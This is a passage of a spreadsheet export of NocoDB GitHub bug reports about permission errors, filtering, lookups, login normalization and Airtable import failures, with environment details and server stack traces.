    <t xml:space="preserve">Node: **v14.18.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **sqlite3** ProjectOnRootDB: **true** RootDB: **sqlite3** PackageVersion: **0.84.16** - create country hm city relation table - expand cityList in preview mode (commenter/ viewer) Expected ![Screenshot 2022-04-16 at 2 16 48 PM](https://user-images.githubusercontent.com/86527202/163668664-570bc7a7-5a6e-45a2-9895-fb8c2ab26b37.png) Observed ![Screenshot 2022-04-16 at 2 11 30 PM](https://user-images.githubusercontent.com/86527202/163668665-c853ad14-c09d-4b8f-aacf-0d2afb0f0381.png)  projectAclMiddleware :: Forbidden [Error]: hmList - commenter : Not allowed at Function.forbidden (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:47:11) at projectAclMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:63:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:23:7) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/extractProjectIdAndAuthenticate.ts:141:5) GET /api/v1/db/data/noco/x/country/1/hm/title5?limit=10&amp;offset=0 403 42 - 4.165 ms </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1694</t>
  </si>
  <si>
    <t>Project info access fails in commenter/ viewer mode</t>
  </si>
  <si>
    <t xml:space="preserve">Node: **v14.18.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **sqlite3** ProjectOnRootDB: **true** RootDB: **sqlite3** PackageVersion: **0.84.16** - copy project info to clipboard fails in commenter/ viewer mode - was enabled in NC v1  projectAclMiddleware :: Forbidden [Error]: projectInfoGet - viewer : Not allowed at Function.forbidden (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:47:11) at projectAclMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:63:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:23:7) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/extractProjectIdAndAuthenticate.ts:141:5) </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1713</t>
  </si>
  <si>
    <t>shared base- fields showAll/ HideAll error</t>
  </si>
  <si>
    <t xml:space="preserve">Node: **v14.18.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **sqlite3** ProjectOnRootDB: **true** RootDB: **sqlite3** PackageVersion: **0.84.18**  GET /api/v1/db/meta/audits/comments/count?ids[]=3&amp;ids[]=2&amp;ids[]=1&amp;fk_model_id=md_ruy5tydtlvchvt 304 - - 2.365 ms projectAclMiddleware :: Forbidden [Error]: viewUpdate - editor : Not allowed at Function.forbidden (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:47:11) at projectAclMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:63:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:23:7) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/extractProjectIdAndAuthenticate.ts:141:5) PATCH /api/v1/db/meta/views/vw_64yqwazih1twez 403 43 - 4.732 ms projectAclMiddleware :: Forbidden [Error]: hideAllColumns - editor : Not allowed at Function.forbidden (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:47:11) at projectAclMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:63:17) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at authMiddleware (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/ncMetaAclMw.ts:23:7) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/catchError.ts:6:20 at Layer.handle [as handle_request] (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/layer.js:95:5) at next (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/express/lib/router/route.js:137:13) at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/noco/meta/helpers/extractProjectIdAndAuthenticate.ts:141:5) POST /api/v1/db/meta/views/vw_64yqwazih1twez/hide-all 403 47 - 3.106 ms </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1722</t>
  </si>
  <si>
    <t>Can't access projects since upgrade to 0.90.0</t>
  </si>
  <si>
    <t>Hi, I just tried upgrading NocoDB from 0.84.16 to 0.90.0 using `docker-compose pull`, and I'm experiencing some issues. When I loaded NocoDB in my browser the first time after the upgrade, I got presented with the Sign Up page, but I mindlessly entered my login info (that was already in the database) and clicked "Sign Up", not realizing it was not the login page. At that point, I got redirected to my project list, like if I had just logged in. The problem is that now every project I try to open fails to load with the message: "Error: Request failed with status code 403". Did I just break something in my account info? I'm guessing this might be a problem with the data in the database, don't hesitate to ask for contents of tables if needed. Thanks for the awesome work on NocoDB, I'm really enjoying it! **Steps To Reproduce** 1. Upgrade from version 0.84.16 using `docker-compose pull &amp;&amp; docker-compose up --build -d` 2. Go to NocoDB URL 3. Fill the sign up form with information already found in the database and submit form 4. Try to load any project 5. See error about HTTP 403 **Expected behavior** Be able to load projects NocoDB used as docker : true NocoDB version : 0.90.0 Database used in NC_DB URL : mysql Project was created by clicking : New Project by connecting to external database Database on which spreadsheet is created : mysql OS on which NocoDB is running : Docker on Ubuntu Server 20.04.4 LTS Database version : MariaDB 10.7.3</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1756</t>
  </si>
  <si>
    <t>Filter doesn't return correct results on linked record</t>
  </si>
  <si>
    <t>please provide the following details : NocoDB used as docker : true NocoDB version : 0.90.3 Database used in NC_DB URL : sqlite3 Project was created by clicking : New Project Database on which spreadsheet is created : sqlite3 **Steps To Reproduce** 1. Create two new tables, populate with entries. Case 1: 2. In second table, create a "has many" linked record linked to the first table. 3. Populate the linked record with entries from the first table. 4. Go to the first table, filter by the one-many linked record column. 5. Filter returns every entry if any entry matches the condition, returns no entries if no entry matches the condition (i.e., if the linked records in all of the rows are "A", "B", and "C", filtering for "A" will return all entries, including those linked to "B" and "C", and filtering for "D" will not return anything) Case 2: 6. Now, create a "has many" linked record in the first table which also links to the first table. Populate this with records. 7. Filter by this column. 8. Filter returns the opposite of what is expected -- ie if you filter for "is like" "A", it will return everything that is not like "A", if you filter for "is not like" "A", it will return everything that is like "A". **Expected behavior** In Case 1, the filter should return only the matching entries, not every entry. In Case 2, the filter should return the opposite of what it currently returns.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1866</t>
  </si>
  <si>
    <t>Lookup columns used in filters and formulas cause errors</t>
  </si>
  <si>
    <t>Lookup columns referencing parent's field return errors if used in filters or formulas. Issue is not related to data type (tested with strings and numbers). Lookups from parent entry work as expected. Error message from example below complains on missing '__nc0.nc_0ysj__types_id' and named alike columns. &lt;details&gt; &lt;summary&gt;.gif example&lt;/summary&gt; ![Peek 2022-04-21 15-17](https://user-images.githubusercontent.com/61871501/165140280-18c1e1f6-13d9-4b0a-a6d0-1a3ff584cccc.gif) &lt;/details&gt; Known since v0.90.5.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/1981</t>
  </si>
  <si>
    <t>Nested fields query param does not respect '*' to include all fields</t>
  </si>
  <si>
    <t xml:space="preserve">I want to get all nested fields for the nested column table Since 0.90.10 it started to only return primary key and value for nested colums, f.e. `/api/v1/db/data/noco/AppName/SomeTable/8` returns  { &lt;other data&gt;, SomeNestedColumn: { id: 1, Name: 'name string', } }  Specifying fields directly does work, but is not practical for my use case, since we have a lot of columns and need all of them: `/api/v1/db/data/noco/AppName/SomeTable/8?nested[SomeNestedColumn][fields]=somefield,anotherfield`  { &lt;other data&gt;, SomeNestedColumn: { somefield: 'foo', anotherfield: 'bar', } }  I tried using '*' for it to return all fields but it returns the same as not specifying the fields param (only primary key and value): `/api/v1/db/data/noco/AppName/SomeTable/8?nested[SomeNestedColumn][fields]=*`  { &lt;other data&gt;, SomeNestedColumn: { id: 1, Name: 'name string', } }  I suspect this does code in #1856 does not handle the '*' case correctly: https://github.com/nocodb/nocodb/pull/1856/files#diff-7768878066d19300f9872bc703464d8c2b7f2c79b747d9ee1fd9660805d97e17R48-R74  Node: **v12.22.12** Arch: **x64** Platform: **linux** Docker: **false** Database: **pg** ProjectOnRootDB: **true** RootDB: **pg** PackageVersion: **0.90.10** </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/2014</t>
  </si>
  <si>
    <t>Bug: Filtering by checkbox columns is inconsistent</t>
  </si>
  <si>
    <t>Now, checkboxes can be filtered in UI by using 'is equal' and 'is not equal' with 'false' and 'true' strings. In REST API [docs](https://docs.nocodb.com/developer-resources/rest-apis/#comparison-operators), 'is' and 'isnot' comparison operators exist for boolean values, - but only 'isnot, null' query works. However, query results can be filtered by checkboxes with 'eq' operator. Weird enough, 'not' operator has no effect on 'true' and 'false' strings. I think, solution should be: * Add new comparison options in filter UI to be used with checkboxes, which have to treat 'null' values as false ones. * Fix 'is' and 'isnot' to work as declared in docs.  Node: **v12.22.12** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **true** RootDB: **pg** PackageVersion: **0.90.11**</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/2208</t>
  </si>
  <si>
    <t>Problem with API for Relation Rows</t>
  </si>
  <si>
    <t>Project Info  Node: **v12.22.12** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **true** RootDB: **pg** PackageVersion: **0.91.1**  Hallo! I'm testing API for Relation Rows But, when I try to send a test request, I get an error Parameter columnName turns red (see screenshot) I have two tables: "Sheet1" and "Cars" (see screenshots) Table "Sheet1" has Link To Another Record - it is column "Car". The screenshot 3 shows an example of an attempt to send the Relation Row List method. I click the Execute button and the columnName parameter turns red. Request not sent A similar situation with the Relation Row Add and Relation Row Remove methods.  I don't know if this is a bug or I'm doing something wrong.  ![screenshot-noco bittapp ru-2022 05 31-12_42_23](https://user-images.githubusercontent.com/106589126/171162126-1a6c9d8c-0069-4350-84d4-d8b7477aaebe.png) ![screenshot-noco bittapp ru-2022 05 31-12_43_02](https://user-images.githubusercontent.com/106589126/171162213-e10831df-ce13-43a6-b604-db005ea04f58.png) ![screenshot-noco bittapp ru-2022 05 31-13_22_46](https://user-images.githubusercontent.com/106589126/171162483-70033e82-92c6-46fd-be8a-a246c0f4c959.png)</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/2242</t>
  </si>
  <si>
    <t>NocoDB can't display the values of a cell when it's of type `LinkToAnotherRecord` and has hundreds of connections</t>
  </si>
  <si>
    <t>## Problem I have a table for email addresses and a table for newsletter subscribers. I added 50.000 subscribers to one newsletter. Therefore, there are 50,000 connections in the "Addresses" field in the newsletter table for the row "Wheelmap". You can see this also in the video. In the newsletter table, we see only ~30 connections. But when we switch to the email address table, we see that also emails like `7444@test.com` have also a connection to the newseltter. https://user-images.githubusercontent.com/24459435/171715335-892f9626-52f0-44e0-85a2-571b0d37d80c.mov The response by the REST API shows the same as the client: &lt;details&gt; &lt;summary&gt;Response&lt;/summary&gt; json { "Id": 0, "Name": "Wheelmap", "Mailjet ID": "17634", "Addresses": [ { "Id": 17076, "Email": "17063@test.com", "CreatedAt": "2022-06-02T13:37:38.787Z", "UpdatedAt": "2022-06-02T18:29:23.967Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 17077, "Email": "17064@test.com", "CreatedAt": "2022-06-02T13:37:38.798Z", "UpdatedAt": "2022-06-02T18:29:23.974Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 17078, "Email": "17065@test.com", "CreatedAt": "2022-06-02T13:37:38.812Z", "UpdatedAt": "2022-06-02T18:29:23.982Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 6, "Email": "561fe5b8dc0c45a19@gmail.com", "CreatedAt": "2022-06-01T20:19:28.864Z", "UpdatedAt": "2022-06-02T17:41:04.185Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 12, "Email": "0@test.com", "CreatedAt": "2022-06-02T13:32:40.471Z", "UpdatedAt": "2022-06-02T18:07:16.208Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 15, "Email": "2@test.com", "CreatedAt": "2022-06-02T13:33:40.743Z", "UpdatedAt": "2022-06-02T18:07:16.240Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 16, "Email": "3@test.com", "CreatedAt": "2022-06-02T13:33:40.769Z", "UpdatedAt": "2022-06-02T18:07:16.249Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 17, "Email": "4@test.com", "CreatedAt": "2022-06-02T13:33:40.799Z", "UpdatedAt": "2022-06-02T18:07:16.260Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 18, "Email": "5@test.com", "CreatedAt": "2022-06-02T13:33:40.828Z", "UpdatedAt": "2022-06-02T18:07:16.272Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 19, "Email": "6@test.com", "CreatedAt": "2022-06-02T13:33:40.847Z", "UpdatedAt": "2022-06-02T18:07:16.290Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 20, "Email": "7@test.com", "CreatedAt": "2022-06-02T13:33:40.869Z", "UpdatedAt": "2022-06-02T18:07:16.306Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 22, "Email": "9@test.com", "CreatedAt": "2022-06-02T13:33:40.925Z", "UpdatedAt": "2022-06-02T18:07:16.330Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 23, "Email": "10@test.com", "CreatedAt": "2022-06-02T13:33:40.953Z", "UpdatedAt": "2022-06-02T18:07:16.336Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 24, "Email": "11@test.com", "CreatedAt": "2022-06-02T13:33:40.983Z", "UpdatedAt": "2022-06-02T18:07:16.341Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 25, "Email": "12@test.com", "CreatedAt": "2022-06-02T13:33:41.016Z", "UpdatedAt": "2022-06-02T18:07:16.353Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 26, "Email": "13@test.com", "CreatedAt": "2022-06-02T13:33:41.047Z", "UpdatedAt": "2022-06-02T18:07:16.365Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 28, "Email": "15@test.com", "CreatedAt": "2022-06-02T13:33:41.112Z", "UpdatedAt": "2022-06-02T18:07:16.387Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 29, "Email": "16@test.com", "CreatedAt": "2022-06-02T13:33:41.139Z", "UpdatedAt": "2022-06-02T18:07:16.402Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 30, "Email": "17@test.com", "CreatedAt": "2022-06-02T13:33:41.161Z", "UpdatedAt": "2022-06-02T18:07:16.409Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null }, { "Id": 31, "Email": "18@test.com", "CreatedAt": "2022-06-02T13:33:41.191Z", "UpdatedAt": "2022-06-02T18:07:16.415Z", "emails_id": null, "emails_id1": null, "newsletter_id": 0, "menschen_id": null } ] }  &lt;/details&gt; ## What I would expect I would expect to see all 50.000 connections in the "Wheelmap" row or some kind of pagination. The same for the API.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/2361</t>
  </si>
  <si>
    <t>Normalization is breaking the login process</t>
  </si>
  <si>
    <t>Node: **v12.22.12** Arch: **x64** Platform: **linux** Docker: **true** Database: **pg** ProjectOnRootDB: **false** RootDB: **pg** PackageVersion: **0.91.8** Running a local NocoDB on Postgres. **Steps To Reproduce** 1. Register a user with mail `1Aa@test.com` 2. Log Out 3. Try logging in **Expected Behavior** I should be logged in. Instead, I get this error message: ![image](https://user-images.githubusercontent.com/4245227/173578131-daa1dc2b-e72a-4cd5-b7ac-e0173593c19e.png) Weird. When I went to try signing up again, I get *this:* ![image](https://user-images.githubusercontent.com/4245227/173578294-5ed83def-90f6-44dc-aa07-ad3d9c6aca2a.png) **Cause** I went to check the DB whether the user actually exists or not, and found the problem. ![image](https://user-images.githubusercontent.com/4245227/173578967-9f9b1c16-fa01-4bcb-b02d-3d305897f984.png) When I tried logging in with the e-mail in all lowercase, it worked. So the issue is being caused by storing the emails in lowercase, then comparing them in a case-sensitive manner with the original, uppercase version on next login attempt.</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/2776</t>
  </si>
  <si>
    <t>Select v2: Airtable import broken</t>
  </si>
  <si>
    <t xml:space="preserve">Node: **v16.14.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **mysql2** ProjectOnRootDB: **true** RootDB: **mysql2** PackageVersion: **0.92.4** - Import content calendar  GET /api/v1/db/meta/tables/md_cc065a7eg9o2cj 200 19501 - 4.440 ms     EXCEPTION OCCURED!! in MysqlClient @ tableUpdate   - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   MESSAGE:   Cannot read properties of null (reading 'endsWith')     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   CODE:   undefined     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -   STACK:   TypeError: Cannot read properties of null (reading 'endsWith')   at MysqlClient.alterTableColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2470:15)   at MysqlClient.alterTableChangeColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2431:17)   at MysqlClient.tableUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2106:27)   at SqlMgrv2.sqlOpPlus (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-mgr/v2/SqlMgrv2.ts:81:55)   at columnUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/api/columnApis.ts:922:18)   at runMicrotasks (&lt;anonymous&gt;)   at processTicksAndRejections (node:internal/process/task_queues:96:5)   at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:6:14     - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       TypeError: Cannot read properties of null (reading 'endsWith') at MysqlClient.alterTableColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2470:15) at MysqlClient.alterTableChangeColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2431:17) at MysqlClient.tableUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2106:27) at SqlMgrv2.sqlOpPlus (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-mgr/v2/SqlMgrv2.ts:81:55) at columnUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/api/columnApis.ts:922:18) at runMicrotasks (&lt;anonymous&gt;) at processTicksAndRejections (node:internal/process/task_queues:96:5) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:6:14 columnUpdate :: TypeError: Cannot read properties of null (reading 'endsWith') at MysqlClient.alterTableColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2470:15) at MysqlClient.alterTableChangeColumn (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2431:17) at MysqlClient.tableUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-client/lib/mysql/MysqlClient.ts:2106:27) at SqlMgrv2.sqlOpPlus (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/db/sql-mgr/v2/SqlMgrv2.ts:81:55) at columnUpdate (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/api/columnApis.ts:922:18) at runMicrotasks (&lt;anonymous&gt;) at processTicksAndRejections (node:internal/process/task_queues:96:5) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:6:14 PATCH /api/v1/db/meta/columns/cl_yssmfj5zxz5s8m 400 61 - 7.350 ms Error: Cannot read properties of null (reading 'endsWith') at exports.default (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/api/sync/helpers/job.ts:2286:13) at runMicrotasks (&lt;anonymous&gt;) at processTicksAndRejections (node:internal/process/task_queues:96:5) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/jobs/EmitteryJobsMgr.ts:25:9 at async Promise.all (index 0) at Emittery.emit (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/node_modules/emittery/index.js:257:3) </t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/3648</t>
  </si>
  <si>
    <t>Display error on accessing disabled shared base link</t>
  </si>
  <si>
    <t>Node: **v16.14.0** Arch: **arm64** Platform: **darwin** Docker: **false** Database: **mysql2** ProjectOnRootDB: **false** RootDB: **mysql2** PackageVersion: **0.96.4** - Share base - Copy URL - Disable `share base` - Access copied URL: page keeps loading. Throw error instead (like its done for shared view case) : `Invalid URL`</t>
  </si>
  <si>
    <t>https://github.com/nocodb/nocodb/issues/4176</t>
  </si>
  <si>
    <t>Bug: error during airtable import (feat/at-import-memory)</t>
  </si>
  <si>
    <t xml:space="preserve"> Please confirm if bug report does NOT exists already ? - [X] I confirm there is no existing issue for this  Steps to reproduce ? Xcdb import though got completed - noticed the following error. Do check if its relevant to the change  uploadViaURL :: TypeError: undefined is not iterable (cannot read property Symbol(Symbol.iterator)) at Function.all (&lt;anonymous&gt;) at uploadViaURL (/Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/api/attachmentApis.ts:58:37) at /Users/rajuudava/NocoDB/nocodb/packages/nocodb/src/lib/meta/helpers/catchError.ts:6:14 POST /api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage 400 82 - 10.179 ms Error: Request failed with status code 400 at createError (/Users/rajuudava/NocoDB/nocodb/packages/nocodb-sdk/node_modules/axios/lib/core/createError.js:16:15) at settle (/Users/rajuudava/NocoDB/nocodb/packages/nocodb-sdk/node_modules/axios/lib/core/settle.js:17:12) at IncomingMessage.handleStreamEnd (/Users/rajuudava/NocoDB/nocodb/packages/nocodb-sdk/node_modules/axios/lib/adapters/http.js:269:11) at IncomingMessage.emit (node:events:532:35) at IncomingMessage.emit (node:domain:475:12) at endReadableNT (node:internal/streams/readable:1346:12) at processTicksAndRejections (node:internal/process/task_queues:83:21) { config: { url: '/api/v1/db/storage/upload-by-url', method: 'post', headers: { Accept: 'application/json, text/plain, */*', 'Content-Type': 'application/json', 'xc-auth': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InVzZXJAbm9jb2RiLmNvbSIsImZpcnN0bmFtZSI6bnVsbCwibGFzdG5hbWUiOm51bGwsImlkIjoidXNfcnl3Y3FwZmNtbTY4ZnUiLCJyb2xlcyI6InVzZXIsc3VwZXIiLCJ0b2tlbl92ZXJzaW9uIjoiZjA4MTMwOTMzNjUwNDhjYjRmMjdlMGI5Y2E2ZjY5ZjMwY2RjNDU0NWEyZjIyMmI2ZDdkMDY1ZjgwYTAzYTNjOGIxNDZlYTk3NjNhYzA4MWYiLCJpYXQiOjE2NjY3MDI2NTYsImV4cCI6MTY2NjczODY1Nn0.ymEEHLj526QrJgcfNJzJY9fCTBHXlX3GuHeG6U21Vfg', 'User-Agent': 'axios/0.21.4' }, params: { path: 'noco/x/Shots/Image' }, baseURL: 'http://localhost:8080', transformRequest: [ [Function: transformRequest] ], transformResponse: [ [Function: transformResponse] ], timeout: 0, adapter: [Function: httpAdapter], xsrfCookieName: 'XSRF-TOKEN', xsrfHeaderName: 'X-XSRF-TOKEN', maxContentLength: -1, maxBodyLength: -1, validateStatus: [Function: validateStatus], transitional: { silentJSONParsing: true, forcedJSONParsing: true, clarifyTimeoutError: false }, data: undefined }, request: &lt;ref *1&gt; ClientRequest { _events: [Object: null prototype] { abort: [Function (anonymous)], aborted: [Function (anonymous)], connect: [Function (anonymous)], error: [Function (anonymous)], socket: [Function (anonymous)], timeout: [Function (anonymous)], prefinish: [Function: requestOnPrefinish] }, _eventsCount: 7, _maxListeners: undefined, outputData: [], outputSize: 0, writable: true, destroyed: false, _last: true, chunkedEncoding: false, shouldKeepAlive: false, maxRequestsOnConnectionReached: false, _defaultKeepAlive: true, useChunkedEncodingByDefault: true, sendDate: false, _removedConnection: false, _removedContLen: false, _removedTE: false, _contentLength: 0, _hasBody: true, _trailer: '', finished: true, _headerSent: true, _closed: false, socket: Socket { connecting: false, _hadError: false, _parent: null, _host: 'localhost', _readableState: [ReadableState], _events: [Object: null prototype], _eventsCount: 7, _maxListeners: undefined, _writableState: [WritableState], allowHalfOpen: false, _sockname: null, _pendingData: null, _pendingEncoding: '', server: null, _server: null, parser: null, _httpMessage: [Circular *1], [Symbol(async_id_symbol)]: 58920, [Symbol(kHandle)]: [TCP], [Symbol(kSetNoDelay)]: false, [Symbol(lastWriteQueueSize)]: 0, [Symbol(timeout)]: null, [Symbol(kBuffer)]: null, [Symbol(kBufferCb)]: null, [Symbol(kBufferGen)]: null, [Symbol(kCapture)]: false, [Symbol(kBytesRead)]: 0, [Symbol(kBytesWritten)]: 0, [Symbol(RequestTimeout)]: undefined }, _header: 'POST /api/v1/db/storage/upload-by-url?path=noco%2Fx%2FShots%2FImage HTTP/1.1\r\n' + 'Accept: application/json, text/plain, */*\r\n' + 'Content-Type: application/json\r\n' + 'xc-auth: 